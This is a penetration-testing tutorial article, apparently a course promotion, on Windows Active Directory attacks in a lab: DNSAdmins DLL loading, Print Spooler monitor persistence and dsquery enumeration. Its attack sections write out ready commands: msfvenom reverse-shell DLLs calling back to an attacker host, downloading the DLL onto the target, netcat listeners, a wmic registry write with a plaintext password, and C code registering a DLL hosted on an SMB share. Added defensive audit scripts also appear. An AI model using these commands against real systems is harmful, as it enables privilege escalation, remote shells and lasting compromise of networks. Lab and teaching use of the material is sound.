Flea market for Pentester

The goal of this article is to collect interesting tools, techniques, and commands that can be used to accomplish tasks in penetration testing. A short list of what will be in this article:

  • What’s the matter with DNSAdmins?

  • Persistence

  • Can you do without Bloodhound?

DNSAdmins

Penetration testing of a network running Windows AD services is a fairly common task for a penetration tester. To complete it successfully, that is, to find every possible configuration flaw and obtain the highest privileges, you need to check as many attack vectors as possible.

What’s the matter with DNSAdmins? Let’s say we have a Windows AD infrastructure and we want to obtain the user database held on a domain controller. We will reproduce the situation in a virtual lab. Lab composition:

  • Windows Server 2019 in a standard Windows AD setup, IP address: 192.168.1.172

  • Kali Linux as the attack machine, IP address: 192.168.1.3

Lab setup, initial conditions:

  • the attacker gains access to an account that belongs to the DNSAdmins group;

  • the victim’s account has remote access enabled via WinRM.

What is DNSAdmins from a Windows AD perspective? Information about this can be found here.

It is the group responsible for the functioning of the DNS service, and that service is critical to the entire infrastructure: any object in AD is reached only after a query to the DNS server. Therefore, if the service is compromised, the attacker can make the entire infrastructure behave as he wants. The most devastating attacks are MiTM attacks, which are possible if the DNS service uses an incorrectly configured IPv6 network interface. Those interested in this attack can read the details here.

But what are we going to use? Today we will look at how the DNS service works with a special mechanism, described here as a mechanism for processing events and sequences. The mechanism exposes various server functions, from RPC calls to access to the DNS record database. Among all of this we are interested in the handling of R_DnssrvOperation. This is an old feature that allows members of DNSAdmins to load a DLL into the memory of the service process. The library is not validated in any way, so it can be used to obtain the highest privileges on the system.

The attack is carried out in several stages:

  • DLL generation. In this step we use msfvenom. It is better to generate a payload that uses the most lightweight and simple shell; in our case it is windows/shell/reverse_tcp. The command to generate it is as follows:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.3 LPORT=4444 -f dll -o test.dll

We will deliver the library through an HTTP server. On the Kali machine, run the following command from the directory containing the generated library:

python3 -m http.server 7979

  • Download the library onto the target host as the DNSAdmins group member (in our case, user test3). This can be done, for example, with the following PowerShell command:

Invoke-WebRequest -URI "http://192.168.1.3:7979/test.dll" -OutFile "C:\Users\test2\Desktop\test.dll"

  • Start the listener. You can use the Metasploit module exploit/multi/handler, configured for the payload above, or simply netcat:

nc -lvp 4444

  • Launch the attack on the victim’s machine. For this stage you need the user’s password (the commands are run in the WinRM session):

dnscmd.exe /config /serverlevelplugindll C:\Users\Test2\Desktop\test.dll
sc stop dns
sc start dns

Finally, check the privileges in the resulting shell:
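As an added defensive check (this script is not from the original article), the following PowerShell audits a DNS server for the very setting that the dnscmd command above writes and lists who is able to write it. It assumes it runs on the DNS server with administrative rights and that the RSAT ActiveDirectory module is installed for Get-ADGroupMember; DnsAdmins is the built-in group's sAMAccountName.

```powershell
# Added defensive check, not code from the original article.
# Audits the ServerLevelPluginDll value written by "dnscmd /config /serverlevelplugindll"
# and lists the accounts that are allowed to write it (members of DnsAdmins).
# Assumes: run on the DNS server with admin rights; RSAT ActiveDirectory module present.

$paramsKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
$plugin    = (Get-ItemProperty -Path $paramsKey -ErrorAction SilentlyContinue).ServerLevelPluginDll

if ([string]::IsNullOrEmpty($plugin)) {
    Write-Output 'ServerLevelPluginDll is not set; this is the expected state.'
}
else {
    Write-Warning "ServerLevelPluginDll is set to: $plugin"
    # Any value at all deserves a look; a UNC path or a path outside System32
    # (such as C:\Users\...\test.dll in the article) is a strong indicator.
    $system32 = Join-Path $env:SystemRoot 'System32'
    if ($plugin -like '\\*' -or -not ($plugin -like "$system32\*")) {
        Write-Warning 'The plug-in DLL does not live in System32; treat it as suspicious.'
    }
    # To remediate, remove the value and restart the DNS service:
    #   Remove-ItemProperty -Path $paramsKey -Name ServerLevelPluginDll
    #   Restart-Service -Name DNS
}

# Every member of DnsAdmins (directly or through nested groups) can set this value,
# so the group should contain only accounts that actually administer DNS.
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object SamAccountName, objectClass
```

Process-creation auditing (Security event 4688 with command-line logging enabled) catches the dnscmd.exe invocation itself, and a stop/start of the DNS service immediately afterwards is the telltale sequence; the registry check above is what confirms the value on the host.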

Persistence

After gaining access to a system, it is not always possible to keep that access stable. Automated penetration-testing techniques can have various consequences, from a failure of the tested system to a reboot. To be able to get back in, and to do so automatically, you can use persistence mechanisms.

Persistence is usually achieved through places in the OS that are used to launch commands and applications automatically. As a rule, these are system applications or services. Let’s consider one of them.

Adding your own DLL to the registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

The method uses the Windows Print Spooler. When the system starts, the spooler loads the monitor DLL specified in this registry key. Since it is started as the “System” user, the DLL obtains the corresponding privileges. For convenience, you can write to the registry not a file from a local directory but a path to an SMB share.

Method step by step:

  • Create the DLL:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.3 LPORT=6666 -f dll -o test.dll

  • Open a listener on Kali Linux:

sudo nc -lvvp 6666

  • Share the directory so the DLL can be reached over SMB:

smbserver.py -smb2support test /root

  • Add the DLL to the registry:

wmic /node:192.168.1.10 /user:"lab\test2" /password:Qwerty!@ process call create "reg add \"HKLM\System\CurrentControlSet\Control\Print\Monitors\Slayer\" /v \"Driver\" /d \"\\192.168.1.3\test\test.dll\" /t REG_SZ"

  • Reboot the OS and gain access to the system.

The method can also be implemented by running, as administrator, a program compiled from the following source:

#include <windows.h>
#include <winspool.h>   /* AddMonitor(); link with winspool.lib */

int main(void)
{
    MONITOR_INFO_2 mon = {0};
    TCHAR name[] = TEXT("MonitorSlayer");
    TCHAR arch[] = TEXT("Windows x64");
    /* UNC path to the shared DLL; backslashes must be escaped in C */
    TCHAR dll[]  = TEXT("\\\\192.168.1.3\\test\\test.dll");

    mon.pName        = name;
    mon.pEnvironment = arch;
    mon.pDLLName     = dll;

    /* Level 2 registers the monitor under HKLM\...\Control\Print\Monitors\<pName> */
    AddMonitor(NULL, 2, (LPBYTE)&mon);
    return 0;
}

Now check that the SMB share is accessed, and run any command from the resulting shell.
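As an added defensive check (not from the original article), this PowerShell walks the Print Monitors key that both the reg add command and the AddMonitor program above write to, and flags any monitor whose driver is a UNC path or sits outside System32. It assumes it is run with administrative rights on the host being audited; the monitor name Slayer and the share path from the article appear only as the pattern to look for.

```powershell
# Added defensive check, not code from the original article.
# Lists registered print monitors and flags drivers that spoolsv.exe would load
# from an SMB share or from any location outside System32.
# Assumes: run with administrative rights on the host being audited.

$monitorsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Print\Monitors'
$system32    = Join-Path $env:SystemRoot 'System32'

$report = Get-ChildItem -Path $monitorsKey | ForEach-Object {
    $driver = (Get-ItemProperty -Path $_.PSPath).Driver
    if (-not $driver) { $driver = '' }

    # Built-in monitors use a bare file name (e.g. localspl.dll) resolved from
    # System32. A UNC path like \\192.168.1.3\test\test.dll, or any full path
    # outside System32, is the persistence pattern described in the article.
    $isUnc   = $driver -like '\\*'
    $hasPath = $driver -match '[\\/]'
    $outside = $hasPath -and -not ($driver -like "$system32\*")

    [pscustomobject]@{
        Monitor    = $_.PSChildName
        Driver     = $driver
        Suspicious = $isUnc -or $outside
    }
}

$report | Format-Table -AutoSize

# Remediation for a confirmed rogue entry: delete its subkey and restart the spooler.
#   Remove-Item -Path "$monitorsKey\<MonitorName>" -Recurse
#   Restart-Service -Name Spooler
```

Because AddMonitor writes the same Driver value, the one check covers both variants shown in the article. For live detection, a Sysmon RegistryEvent rule (event ID 13) on this key, or a SACL on it producing Security event 4657, fires when the value is set, and spoolsv.exe loading an image from a network path after the reboot is the second signal.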

Can you do without Bloodhound?

Bloodhound is a tool for obtaining information about infrastructure managed by Windows AD. It collects information that can be used to find special privileges which allow the system to be compromised.

The tool uses all the well-known mechanisms for collecting infrastructure data:

  • ldap

  • kerberos

  • SMB

  • DCOM

  • RPC

Queries are built according to what the user has asked for. Additionally, the tool can collect information about active user sessions on machines.

The tool is quite useful, but what if we don’t need to run so many commands and only want to collect specific pieces of information about AD? Can the same be done? In fact, yes, but you need to know how to use the information-gathering tools. We will consider the dsquery.exe tool, which ships with the RSAT toolkit. Note that queries can only be sent if the session runs as “System”.

The scheme of using the tool is as follows:

dsquery <object type> <filters> <options>

Object types:

WildCard (*), Computer, Contact, Group, OU, Site, Server, User, Quota, Partition

An example of issuing a request to search for users:

An example of issuing a request to search for groups:

In this way you can collect information about Windows AD objects. The remaining tests are left for the reader to perform independently.
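Added example, not from the original article: the dsquery.exe described above, combined with dsget.exe from the same RSAT package, used for a targeted audit rather than a full collection. It assumes a domain-joined host with RSAT installed and ties back to the first section by checking the DnsAdmins group; the name pattern test* and the four-week inactivity window are assumed values.

```powershell
# Added example, not code from the original article.
# Targeted AD queries with dsquery/dsget (RSAT) instead of a full Bloodhound run.
# Assumes: domain-joined host with RSAT installed; test* and 4 weeks are assumed values.

# Object type "group", filter by name: returns the group's distinguished name.
dsquery group -name DnsAdmins

# Pipe the DN into dsget to list members; -expand also walks nested groups,
# which is what matters when auditing who can load a DLL into the DNS service.
dsquery group -name DnsAdmins | dsget group -members -expand

# Object type "user", filter by name: show the logon name and whether the account
# is disabled, the kind of point information the section talks about.
dsquery user -name 'test*' | dsget user -samid -disabled

# Object type "user", filter by inactivity: accounts not used for 4 weeks are the
# ones that should be disabled or removed, since a forgotten account in DnsAdmins
# is exactly what the first section relies on.
dsquery user -inactive 4 | dsget user -samid -disabled
```

dsquery prints distinguished names in quotes, so piping its output into dsget is the reliable way to chain the two tools; capturing the DN in a variable and passing it back as an argument keeps the embedded quotes and may not parse.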


The article was prepared by OTUS expert – Alexander Kolesnikov on the eve of the start of the course “Pentest. Practice of Penetration Testing”

